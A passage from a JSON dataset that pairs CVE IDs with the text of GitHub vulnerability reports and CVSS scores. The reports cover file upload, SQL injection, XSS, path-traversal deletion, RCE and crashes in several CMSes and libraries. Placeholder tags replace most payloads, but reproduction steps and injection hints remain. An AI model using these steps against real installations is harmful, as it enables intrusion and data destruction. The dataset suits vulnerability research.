        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28525",
        "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/5",
        "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/5",
        "Repo_new": "chilin89117/ED01-CMS",
        "Issue_Created_At": "2022-03-31T14:25:34Z",
        "description": "There is a file upload vulnerability here: APITAG Vulnerability file: PATHTAG FILETAG Vulnerability to reproduce: APITAG in to the background, then visit the url: URLTAG The operation is shown in the following figure: FILETAG APITAG url: FILETAG FILETAG Repair suggestion: Only jpg\u3001jpeg,\u3001png files are allowed to be uploaded",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28527",
        "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/5",
        "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/5",
        "Repo_new": "shaogongbra/dhcms",
        "Issue_Created_At": "2022-04-01T08:51:20Z",
        "description": "There is an arbitrary folder deletion vulnerability PATHTAG Vulnerability file: PATHTAG You can see that the following code does not filter ../ or ..\\\\, it just filters . or .., which will cause any folder to be deleted FILETAG Vulnerability to reproduce: APITAG in to the backend first APITAG the packet as follows: APITAG POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Referer: URLTAG Content Length NUMBERTAG Cookie: APITAG DNT NUMBERTAG Connection: close APITAG APITAG You can see that the page shows that the file was deleted successfully FILETAG Repair suggestion: filter ../ or ..\\\\",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28528",
        "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/14",
        "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/14",
        "Repo_new": "alexlang24/bloofoxcms",
        "Issue_Created_At": "2022-04-01T16:12:30Z",
        "description": "There is a file upload vulnerability here: APITAG Vulnerability file: FILETAG You can see that the file is uploaded directly without the verification file suffix. FILETAG Vulnerability to reproduce: APITAG log in to the backend of the website APITAG url: URLTAG . Then operate as shown below: FILETAG APITAG can see that FILETAG is successfully uploaded FILETAG APITAG FILETAG and execute the code to get phpinfo information FILETAG Repair suggestion: Set the upload whitelist and limit the suffixes of uploaded files to gif, jpg, and png",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28552",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/10",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/10",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-01-18T08:12:55Z",
        "description": "Cscms NUMBERTAG has sqlinjection. Log in to the background, open the song module, create a new song, delete it to the recycle bin, and SQL injection security problems will occur when emptying the recycle bin. CODETAG FILETAG CODETAG FILETAG CODETAG FILETAG FILETAG PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28585",
        "Issue_Url_old": "https://github.com/leadscloud/EmpireCMS/issues/5",
        "Issue_Url_new": "https://github.com/leadscloud/empirecms/issues/5",
        "Repo_new": "leadscloud/empirecms",
        "Issue_Created_At": "2022-04-01T08:10:06Z",
        "description": "APITAG NUMBERTAG has sql injection vulnerability. Brief of this vulnerability APITAG NUMBERTAG has sql injection vulnerability in adding advertisement category Test Environment Windows NUMBERTAG PHP APITAG Affect version APITAG NUMBERTAG ulnerable Code PATHTAG line NUMBERTAG The variable $add passed in by the APITAG function is inserted into the sql statement without any filtering, resulting in a sql injection vulnerability FILETAG Vulnerability display First enter the background FILETAG Click as shown,go to the ad management module FILETAG Click to add and capture the packet FILETAG FILETAG Modify parameters APITAG or APITAG or ' FILETAG Successfully obtained the database version number",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28586",
        "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/63",
        "Issue_Url_new": "https://github.com/havok89/hoosk/issues/63",
        "Repo_new": "havok89/hoosk",
        "Issue_Created_At": "2022-04-01T05:25:15Z",
        "description": "XSS on Hoosk NUMBERTAG This vulnerability in edit page function FILETAG Exploit with using \"heading\" attribute, we can custom HTML tag lead to inject img tag with ERRORTAG event, and use HTML encoding to bypass filter some special chars FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28588",
        "Issue_Url_old": "https://github.com/lkmc2/SpringBootMovie/issues/3",
        "Issue_Url_new": "https://github.com/lkmc2/springbootmovie/issues/3",
        "Repo_new": "lkmc2/springbootmovie",
        "Issue_Created_At": "2022-04-01T09:38:04Z",
        "description": "\u4e00\u4e2a\u540e\u53f0\u5b58\u50a8\u578bxss\u6f0f\u6d1e. When adding movie names, malicious code can be stored because there is no filtering of parameters Affected version NUMBERTAG test\uff1a FILETAG The trigger\uff1a FILETAG The main reason is that the code does not filter parameter values\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-28589",
        "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/23",
        "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/23",
        "Repo_new": "pixelimity/pixelimity",
        "Issue_Created_At": "2022-04-01T13:22:07Z",
        "description": "Cross Site Scripting (XSS) in APITAG A Cross Site Scripting vulnerabilty exists in Pixelimity via the Page Title field in PATHTAG Step to exploit NUMBERTAG Login as admin NUMBERTAG Navigate to FILETAG and click on Add New NUMBERTAG Insert XSS payload ( APITAG alert NUMBERTAG APITAG ) in the APITAG field and click on Publish Page. FILETAG FILETAG Proof of concept APITAG APITAG alert NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-28590",
        "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/24",
        "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/24",
        "Repo_new": "pixelimity/pixelimity",
        "Issue_Created_At": "2022-04-02T10:07:05Z",
        "description": "A Remote Code Execution (RCE) vulnerability exists in pixelimity via admin/admin APITAG A Remote Code Execution (RCE) vulnerability exists in pixelimity via admin/admin APITAG Step to exploit NUMBERTAG Login as admin NUMBERTAG Navigate to FILETAG NUMBERTAG Compress APITAG to APITAG file and then upload via Install New Theme NUMBERTAG isit FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-28599",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/595",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/595",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2022-04-02T09:29:18Z",
        "description": "A stored cross site scripting (XSS) vulnerability exists in FUEL CMS NUMBERTAG A stored cross site scripting (XSS) vulnerability exists in FUEL CMS NUMBERTAG that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack NUMBERTAG login as admin .in the Assets page FILETAG NUMBERTAG upload the malicious pdf. the content of FILETAG : CODETAG FILETAG NUMBERTAG back to Assets then we can see xss cookie.svg have been upload: FILETAG NUMBERTAG when user click the FILETAG it will trigger a XSS attack FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-28918",
        "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/116",
        "Issue_Url_new": "https://github.com/greencms/greencms/issues/116",
        "Repo_new": "greencms/greencms",
        "Issue_Created_At": "2022-04-04T10:10:50Z",
        "description": "There is an arbitrary file deletion vulnerability here: APITAG Vulnerability file: PATHTAG FILETAG Vulnerability to reproduce: APITAG log in to the background APITAG url: URLTAG APITAG delete the NUMBERTAG folder in the root directory\uff0cconstruct the packet as follows: APITAG GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG Repair suggestion: APITAG ../ and ..\\\\ APITAG the range of files to delete",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28919",
        "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/3651",
        "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/3651",
        "Repo_new": "dokuwiki/dokuwiki",
        "Issue_Created_At": "2022-03-30T10:23:12Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report for possible XSS vulnerability. The source in this file FILETAG Line NUMBERTAG in function APITAG While the sink in this FILETAG line NUMBERTAG I tried to test the pathinfo function in PHP. And I found it is possible to bypass this function with this example. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28920",
        "Issue_Url_old": "https://github.com/MoeNetwork/Tieba-Cloud-Sign/issues/156",
        "Issue_Url_new": "https://github.com/moenetwork/tieba-cloud-sign/issues/156",
        "Repo_new": "moenetwork/tieba-cloud-sign",
        "Issue_Created_At": "2022-04-06T12:16:33Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file FILETAG line NUMBERTAG APITAG Then, there is an echo in line NUMBERTAG APITAG strip_tags is not secure in this case. If you can look to this code example the alert will be printed when you press on the link. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-28936",
        "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2307",
        "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2307",
        "Repo_new": "fisco-bcos/fisco-bcos",
        "Issue_Created_At": "2022-03-28T12:35:44Z",
        "description": "A malicious node may fake a proposal's header when he is the leader and some transactions cannot be processed. Describe the bug I setup a group of NUMBERTAG nodes under NUMBERTAG rc2 version. One of the nodes is a malicious one and tries to modify some fields when it sends out some packages. Then I use the following command to test the system: APITAG Then some transactions cannot be processed successfully. To Reproduce Steps to reproduce the behavior NUMBERTAG setup a NUMBERTAG nodes group NUMBERTAG start the press test program NUMBERTAG See the error Expected behavior All the transactions should be processed correctly. Screenshots The information of the log: APITAG Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG rc2",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28937",
        "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2312",
        "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2312",
        "Repo_new": "fisco-bcos/fisco-bcos",
        "Issue_Created_At": "2022-03-29T03:14:29Z",
        "description": "A malicious node becomes a leader and set the view to a very large one, blocks cannot be processed. Describe the bug I setup a group with NUMBERTAG nodes. One of them are malicious one. First, the malicious node starts, and after that all the other nodes start. Then I start the press testing program to send transactions to the group. And it stuck here: APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG setup NUMBERTAG nodes NUMBERTAG start press testing program NUMBERTAG the bug occurs Expected behavior The system should not stuck and keep changing the view. Screenshots APITAG APITAG Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG rc2 Additional context There maybe an integer overflow during the viewchange and the malicious node can always be the leader.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28945",
        "Issue_Url_old": "https://github.com/WeBankPartners/wecube-platform/issues/2324",
        "Issue_Url_new": "https://github.com/webankpartners/wecube-platform/issues/2324",
        "Repo_new": "webankpartners/wecube-platform",
        "Issue_Created_At": "2022-05-30T07:34:35Z",
        "description": "zip slip . \u89e3\u538b\u6587\u4ef6\u65f6\u672a\u5bf9 ../ \u8fdb\u884c\u6821\u9a8c Demo\uff1a ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28948",
        "Issue_Url_old": "https://github.com/go-yaml/yaml/issues/666",
        "Issue_Url_new": "https://github.com/go-yaml/yaml/issues/666",
        "Repo_new": "go-yaml/yaml",
        "Issue_Created_At": "2020-10-21T17:29:20Z",
        "description": "NUMBERTAG panic \"attempted to parse unknown event (please report): none\". Hi folks \ud83d\udc4b\ud83c\udffb Found this panic (along with NUMBERTAG while fuzzing my own project. Minimal example of the panic ( URLTAG ERRORTAG Output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28966",
        "Issue_Url_old": "https://github.com/wasm3/wasm3/issues/320",
        "Issue_Url_new": "https://github.com/wasm3/wasm3/issues/320",
        "Repo_new": "wasm3/wasm3",
        "Issue_Created_At": "2022-04-07T06:41:07Z",
        "description": "FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-28985",
        "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1217",
        "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1217",
        "Repo_new": "orangehrm/orangehrm",
        "Issue_Created_At": "2022-04-07T12:40:53Z",
        "description": "Stored XSS in APITAG Status\" section under APITAG via the GET/POST parameters APITAG and APITAG . Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug Insufficient input validation in Buzz APITAG API results in Stored Cross Site Scripting attack. An attacker who is an authenticated user can craft a malicious request causing malicious Javascript to execute in the browser of any other user. The malicious Javascript can trigger when a victim user visits the Buzz page. To Reproduce NUMBERTAG Authenticate to the user dashboard NUMBERTAG isit APITAG page NUMBERTAG Collect the CSRF token from the HTML response. It can be found in an 'input' field with the id APITAG . Example : APITAG NUMBERTAG Collect the logged in user cookie APITAG NUMBERTAG Fire the following POST request including the CSRF token and cookie obtained. Replace the Host header too : CODETAG NUMBERTAG Click on the link 'xss' in the most recent post. Expected behavior The value of parameters APITAG and APITAG should be validated by API and an error should be thrown. What do you see instead: The malicious payload gets submitted successfully and get's stored in the posting made by the user. Screenshots FILETAG FILETAG Technical Details A logged in user can post status updates to their buzz feed. From the front end application a user will be able to post a text within a single field which says APITAG on your mind\" to the buzz feed. This happens via a POST request to the URL APITAG through the APITAG request body parameter. While investigating this API, we found that there are extra parameter fields in the body of this API which is not directly exposed through the frontend application. The following request body parameters found in the API results certain profound effects in the HTML response sent by server NUMBERTAG APITAG Causes the addition of an APITAG anchor tag in response with id APITAG & with attribute src with the value set for APITAG parameter NUMBERTAG APITAG Causes an APITAG anchor tag in response with id APITAG which is click able and displayed with the text content sent in the above request parameter. Combining the above NUMBERTAG parameters, it's possible to get an anchor HTML tag with a visible clickable text and a desired URL as src which is clickable. The URL payload could be javascript as APITAG . This can result in execution of arbitrary malicious javascript code on the client side if the victim clicks on this link. The impact of this can be severe since this particular code gets stored in the database and gets delivered to the feed of every logged in user in APITAG Every user will have this delivered through their APITAG feed. In terms of impact, this vulnerability enables an attacker to stealing CSRF token and perform arbitrary actions on the website on behalf of the victim user.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-28995",
        "Issue_Url_old": "https://github.com/zongdeiqianxing/rengine/issues/1",
        "Issue_Url_new": "https://github.com/zongdeiqianxing/rengine/issues/1",
        "Repo_new": "zongdeiqianxing/rengine",
        "Issue_Created_At": "2022-04-08T01:48:22Z",
        "description": "URLTAG rce report. URLTAG Hello, I found that there is an rce vulnerability in the yaml configuration function in the rengine NUMBERTAG ersion. The yaml file can be written arbitrarily, and the background code does not verify and filter it directly into the os.system statement, which leads to this vulnerability. Take 'dirsearch as an example . FILETAG FILETAG FILETAG ============== It should be noted that the program must scan subdomains by default before performing dirsearch scanning, so you need to wait for a while when trying to exploit rce FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29001",
        "Issue_Url_old": "https://github.com/lkmc2/SpringBootMovie/issues/4",
        "Issue_Url_new": "https://github.com/lkmc2/springbootmovie/issues/4",
        "Repo_new": "lkmc2/springbootmovie",
        "Issue_Created_At": "2022-04-08T08:49:20Z",
        "description": "Arbitrary file upload vulnerability. Affected version NUMBERTAG Upload a compromised file with the suffix .php FILETAG Published successfully FILETAG Vulnerable code\uff1a FILETAG The reason for the vulnerability is that the file suffix is not filtered here",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29017",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/691",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/691",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2022-04-10T14:50:23Z",
        "description": "APITAG SEGV PATHTAG . SUMMARY: APITAG SEGV PATHTAG Version CODETAG branch NUMBERTAG d8e1fc Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks !!",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29020",
        "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/76",
        "Issue_Url_new": "https://github.com/saysky/forestblog/issues/76",
        "Repo_new": "saysky/forestblog",
        "Issue_Created_At": "2022-04-10T10:25:04Z",
        "description": "XSS attacks occur when user profile pictures are updated. APITAG user information and save it FILETAG APITAG profile picture address in the packet capture request is changed",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-29080",
        "Issue_Url_old": "https://github.com/barneycarroll/npm-dependency-versions/issues/6",
        "Issue_Url_new": "https://github.com/barneycarroll/npm-dependency-versions/issues/6",
        "Repo_new": "barneycarroll/npm-dependency-versions",
        "Issue_Created_At": "2022-04-06T19:49:43Z",
        "description": "Potential command injection vulnerability in npm dependency versions. Hi, Thanks for devloping this great npm package! We find a potential command injection vulnerabilty from it. The bug is caused by the fact that package exported method fail to sanitize pkgs parameter and let it flow into a sensitive command execution API. Here is the proof of concept. APITAG Please consider fix it. thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29185",
        "Issue_Url_old": "https://github.com/constantoine/totp-rs/issues/13",
        "Issue_Url_new": "https://github.com/constantoine/totp-rs/issues/13",
        "Repo_new": "constantoine/totp-rs",
        "Issue_Created_At": "2022-04-24T07:41:34Z",
        "description": "Unsafe token check. Currently, a simple string comparison in the check method is used to validate the token. To resist timing attack, we need to use constant time comparison algorithm. Details URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.4,
        "impactScore": 3.6,
        "exploitabilityScore": 0.7
    },
    {
        "CVE_ID": "CVE-2022-29202",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/55199",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/55199",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2022-03-11T09:56:38Z",
        "description": "Missing input validation on APITAG . APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: APITAG installed from (source or binary): APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): APITAG version (if compiling from source): APITAG version: using a colab notebook GPU model and memory: using a colab notebook You can collect some of this information using our environment capture FILETAG You can also obtain the APITAG version with NUMBERTAG TF NUMBERTAG APITAG NUMBERTAG TF NUMBERTAG APITAG Describe the current behavior All RAM is consumed, causing the notebook to crash Describe the expected behavior Some input validation should be done and an exception thrown. Contributing URLTAG Do you want to contribute a PR? (yes/no): Briefly describe your candidate solution(if contributing): Standalone code to reproduce the issue Provide a reproducible test case that is the bare minimum necessary to generate the problem. If possible, please share a link to PATHTAG notebook. The colab notebook: URLTAG APITAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29211",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/45770",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/45770",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2020-12-17T00:40:20Z",
        "description": "Segmentation fault in tf.histogram_fixed_width. APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crashes (segmentation fault) when values contain nan Describe the expected behavior Expect no crash Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG value_range NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29212",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/43661",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/43661",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2020-09-30T01:56:21Z",
        "description": "Core dumped when invoking APITAG model converted using latest nightly APITAG converter NUMBERTAG de NUMBERTAG System information OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG APITAG installed from (source or binary): binary APITAG version (or github SHA if from source NUMBERTAG de NUMBERTAG Command used to run the converter or code if you\u2019re using the Python API ERRORTAG Link to Google Colab Notebook APITAG The output from the converter invocation ERRORTAG Also, please include a link to the saved model or APITAG APITAG Failure details The conversion is successful in that it generates a tflite graph. However, when I invoke the graph, I get a core dump error NUMBERTAG abort (core dumped) python APITAG Any other info / logs CODETAG Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. Traceback ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29213",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/55263",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/55263",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2022-03-17T05:41:45Z",
        "description": "APITAG and APITAG lacks input validation leading to crashes. System information Have I written custom code (as opposed to using a stock example script provided in APITAG Yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG N/A Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python APITAG Bazel version (if compiling from source): APITAG version (if compiling from source): APITAG version NUMBERTAG based on a colab notebook) GPU model and memory: Tesla T4, APITAG (based on a colab notebook) Describe the current behavior The following code snippets lead to crashes when executed: CODETAG and CODETAG In either case, the inputs do not quite make sense, and tensorflow should throw. Describe the expected behavior Tensorflow should throw exceptions instead of crashing. Contributing URLTAG Do you want to contribute a PR? (yes/no): Briefly describe your candidate solution(if contributing): Standalone code to reproduce the issue Here is a colab notebook: URLTAG The code snippets above should also reproduce the issue.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29305",
        "Issue_Url_old": "https://github.com/helloxz/imgurl/issues/75",
        "Issue_Url_new": "https://github.com/helloxz/imgurl/issues/75",
        "Repo_new": "helloxz/imgurl",
        "Issue_Created_At": "2022-04-11T09:19:12Z",
